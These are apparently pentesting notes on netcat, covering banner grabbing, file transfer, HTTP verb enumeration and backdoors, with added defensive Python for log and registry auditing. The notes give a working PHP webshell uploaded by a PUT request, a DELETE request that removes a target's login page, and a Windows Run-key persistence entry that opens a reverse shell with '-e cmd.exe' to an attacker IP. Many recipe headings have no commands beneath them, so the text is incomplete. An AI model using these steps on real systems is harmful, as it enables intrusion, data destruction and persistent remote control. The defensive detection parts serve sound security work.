netcat
Installation
Preinstalled in Kali. Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.
For windows: https://nmap.org/ncat/.
For Linux:
Usage
It’s used for HTTP
Fingerprinting with netcat
Also, Nmap does not always identify every service fully by default. Sometimes you can use netcat to interrogate a service directly and read what it answers:
Netcat commands
As a server
nc -lvp 8888
#-l: listen mode (act as a server)
#-v: verbose output
#-p: local port to listen on
#-u: use UDP instead of TCP
#-e: execute the given program once a connection is made (only present in netcat-traditional and ncat; the OpenBSD netcat shipped by many distributions has no -e)
As a client
Transfer data
On the server side:
On the client side:
Transfer data and save it in a file
On the server side:
On the client side:
Transfer file and save it
On the server side:
On the client side:
Netcat shell
On the server side:
On the client side:
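What netcat actually does in the transfer recipes above is nothing more than a TCP listen/accept on one side and a connect/send on the other, with the client's close (EOF) telling the listener that the file is complete. The following Python script, added here as an illustration and not part of the original notes, reproduces that exchange in-process: one thread plays the `nc -lvp PORT > file` side, the main thread plays the `nc HOST PORT < file` side, and the payload is a constructed byte string standing in for the file. The host, port choice (port 0, so the OS picks a free one) and temp file are assumptions of the example.

```python
import os
import socket
import tempfile
import threading


def receive_to_file(listener, path):
    """Server side: accept one connection and write everything it sends to `path`.

    This is what `nc -lvp PORT > file` does: listen, accept, copy bytes until EOF.
    Returns the number of bytes written.
    """
    conn, _peer = listener.accept()
    total = 0
    with conn, open(path, "wb") as fh:
        while True:
            chunk = conn.recv(4096)
            if not chunk:          # empty read == peer closed the connection (EOF)
                break
            fh.write(chunk)
            total += len(chunk)
    return total


def send_bytes(host, port, payload):
    """Client side: connect, stream `payload`, then close.

    This is `nc HOST PORT < file`: the client's close is what tells the listener
    the transfer is finished, which is why a client that stays open makes the
    receiving side appear to hang.
    """
    with socket.create_connection((host, port), timeout=5) as client:
        client.sendall(payload)


def transfer(payload):
    """Run listener and client in-process on loopback and return what landed in the file."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))        # port 0: let the OS choose a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    fd, path = tempfile.mkstemp()
    os.close(fd)
    received = {}

    def server():
        received["bytes"] = receive_to_file(listener, path)

    t = threading.Thread(target=server)
    t.start()
    send_bytes("127.0.0.1", port, payload)
    t.join()
    listener.close()

    with open(path, "rb") as fh:
        data = fh.read()
    os.remove(path)
    assert received["bytes"] == len(data)
    return data


if __name__ == "__main__":
    # Constructed sample payload standing in for the file you would redirect into nc.
    print(transfer(b"hello from the client\n"))
```

The same loop also explains why a raw netcat transfer gives you no integrity guarantee: the listener writes whatever arrives until the socket closes, so a truncated or tampered stream is saved silently. Compare a hash of the file on both ends after the transfer.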
Some enumeration techniques for HTTP verbs
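Both the fingerprinting section above and this one come down to typing a raw HTTP request into a netcat connection and reading the Server and Allow headers out of the reply. The Python below is an added example, not code from the original notes: `build_request` produces the exact bytes you would type (including the CRLF line endings and the empty line that ends the header block, which is the usual thing people forget when typing by hand), `fingerprint` extracts the banner and the advertised verbs and points out the write verbs (PUT, DELETE, TRACE, CONNECT) that a hardened server should not expose, and `probe` is the live version over a plain socket. The sample response, the host name and the set of "risky" methods are assumptions of the example.

```python
import socket

RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def build_request(method, path, host, http_version="1.0"):
    """Build the raw request bytes exactly as you would type them into `nc host 80`.

    HTTP needs CRLF line endings and an empty line to end the header block;
    a missing empty line is why a hand-typed request just sits there.
    """
    lines = [f"{method} {path} HTTP/{http_version}", f"Host: {host}", "Connection: close", ""]
    return ("\r\n".join(lines) + "\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers dict with lower-cased names)."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_code = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_code, headers


def fingerprint(raw):
    """Pull out what a banner grab gives you: the Server header and the verbs in Allow."""
    status, headers = parse_response(raw)
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return {
        "status": status,
        "server": headers.get("server", "(not disclosed)"),
        "allowed": allowed,
        "risky": allowed & RISKY_METHODS,
    }


def probe(host, port=80, path="/", timeout=5):
    """Live version: send an OPTIONS request over a plain socket and fingerprint the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request("OPTIONS", path, host))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return fingerprint(b"".join(chunks))


# Constructed sample response, standing in for what a loosely configured server returns.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Server: Apache/2.4.41 (Ubuntu)\r\n"
    b"Allow: GET,HEAD,POST,OPTIONS,PUT,DELETE\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE))
```

An empty `risky` set on your own servers, plus a Server header that does not leak the exact version, is the state you want to see when you run this against them.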
Some exploitation techniques for HTTP verbs
DELETE attack
# General syntax for removing a resource from a server using netcat
nc victim.site 80
DELETE /path/to/resource.txt HTTP/1.0
# (the request is only complete once you send an empty line after it)
# Example for removing the login page of a site
nc victim.site 80
DELETE /login.php HTTP/1.0
PUT attack: getting a shell
# Save for instance a basic PHP shell in a file (shell.php):
<?php
if (isset($_GET['cmd']))
{
    $cmd = $_GET['cmd'];
    echo '<pre>';
    $result = shell_exec($cmd);
    echo $result;
    echo '</pre>';
}
?>
# Count the size of the file in bytes (Content-Length is a byte count, so use wc -c, not wc -m)
wc -c shell.php
# Send the PUT request with netcat: headers, then an empty line, then the contents of shell.php
nc victim.site 80
PUT /shell.php HTTP/1.0
Content-Type: text/html
Content-Length: [number you got with wc -c shell.php]

# Run the exploit by typing in the browser:
http://victim.site/shell.php?cmd=cat+/etc/passwd
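Both attacks above leave a clear trail in the web server's access log: a PUT or DELETE request line (with a 2xx status if the server honoured it) followed by GET requests to a freshly created .php file carrying a command parameter. The script below is an added example for the defensive side, not part of the original notes; it parses lines in the Apache/nginx combined format and reports those two patterns. The log lines, the client addresses and the set of parameter names treated as shell-like (`cmd`, `exec`, `command`) are constructed assumptions of the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: client, ident, user, [time], "METHOD TARGET PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

WRITE_METHODS = {"PUT", "DELETE"}
SHELL_PARAMS = {"cmd", "exec", "command"}   # assumed names; extend for your environment


def parse_line(line):
    """Return the request record as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def findings_for(rec):
    """Return the reasons a single request record is suspicious (empty list if none)."""
    reasons = []
    if rec["method"] in WRITE_METHODS:
        # A 2xx answer to PUT/DELETE means the server honoured a write verb it should not expose.
        outcome = "succeeded" if 200 <= rec["status"] < 300 else f"returned {rec['status']}"
        reasons.append(f"{rec['method']} to {rec['target']} {outcome}")
    url = urlsplit(rec["target"])
    params = set(parse_qs(url.query))
    shellish = SHELL_PARAMS & params
    if url.path.endswith(".php") and shellish:
        reasons.append(f"webshell-style parameter ({', '.join(sorted(shellish))}) on {url.path}")
    return reasons


def scan_log(lines):
    """Run the checks over a log and return [(client, method, target, reasons), ...] for hits."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = findings_for(rec)
        if reasons:
            hits.append((rec["client"], rec["method"], rec["target"], reasons))
    return hits


# Constructed sample log lines mirroring the PUT and DELETE sequences described above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "PUT /shell.php HTTP/1.0" 201 0 "-" "-"',
    '10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /shell.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1823 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:57:10 +0000] "DELETE /login.php HTTP/1.0" 405 0 "-" "-"',
]

if __name__ == "__main__":
    for client, method, target, reasons in scan_log(SAMPLE_LOG):
        print(client, method, target, "->", "; ".join(reasons))
```

A PUT that "succeeded" is the finding to act on first: it means the document root is writable through HTTP, and restricting the allowed methods on the server (and removing write permission from the web server's user on the document root) closes both attacks at once.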
Backdoors with netcat
The attacker initiates the connection
In the victim machine: if Windows, get the ncat.exe executable, rename it to something else such as winconfig, and run on the command line:
In the attacker machine:
The victim initiates the connection
Useful for getting past firewalls that block inbound connections but allow outbound ones (which is exactly why egress filtering matters on the defensive side).
In the victim machine: if Windows, get the ncat.exe executable, rename it to something else such as winconfig, and run on the command line:
In the attacker machine:
Creating a registry entry in regedit
- In regedit, go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Right-Button > New > String value
- We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this entry winconfig)
- We edit the registry and we add the path to the executable file and some commands in the Value data:
"C:\Windows\System32\winconfig.exe <attacker IP> <port> -e cmd.exe"
# For instance: "C:\Windows\System32\winconfig.exe 192.168.1.50 5540 -e cmd.exe"
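The Run key entry above is also the artefact a defender looks for: a value whose data is an executable followed by a bare IP and port and a `-e cmd.exe` hand-off. The Python below is an added example, not part of the original notes; it parses the text that `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` prints (one value per line, name, type and data separated by runs of spaces) and flags entries that show those two indicators. The sample output and the indicator patterns are constructed assumptions of the example; to run it against a live host, capture the real `reg query` output and pass it in.

```python
import re

# One line per value as `reg query` prints it: leading spaces, name, type, data, separated by spaces.
REG_LINE_RE = re.compile(r"^\s+(?P<name>\S+)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

# Indicators taken from the backdoor recipe above: a binary told to hand a shell to the
# remote peer (-e cmd.exe) and a bare "<ip> <port>" pair on its command line.
SHELL_HANDOFF_RE = re.compile(r"(?i)\s-e\s+(cmd(\.exe)?|powershell(\.exe)?|/bin/(ba)?sh)\b")
IP_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\b")


def parse_reg_query(output):
    """Parse `reg query` text into a list of (name, type, data) tuples, skipping the key header."""
    values = []
    for line in output.splitlines():
        m = REG_LINE_RE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"].strip()))
    return values


def suspicious_run_entries(output):
    """Return {value_name: [reasons]} for Run entries that look like a netcat-style backdoor."""
    flagged = {}
    for name, _type, data in parse_reg_query(output):
        reasons = []
        if SHELL_HANDOFF_RE.search(data):
            reasons.append("executes a shell for the remote peer (-e)")
        if IP_PORT_RE.search(data):
            reasons.append("hard-coded IP and port on the command line")
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed sample output; the second value is the persistence entry described above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    winconfig    REG_SZ    C:\Windows\System32\winconfig.exe 192.168.1.50 5540 -e cmd.exe
"""

if __name__ == "__main__":
    for name, reasons in suspicious_run_entries(SAMPLE_REG_QUERY).items():
        print(name, "->", "; ".join(reasons))
```

The name check is deliberately absent: the whole point of renaming ncat.exe to winconfig.exe is that the value name looks harmless, so the data (the command line) is what the audit has to judge. The same parser can be pointed at the HKCU Run key and the RunOnce keys, which are the other common locations for this kind of entry.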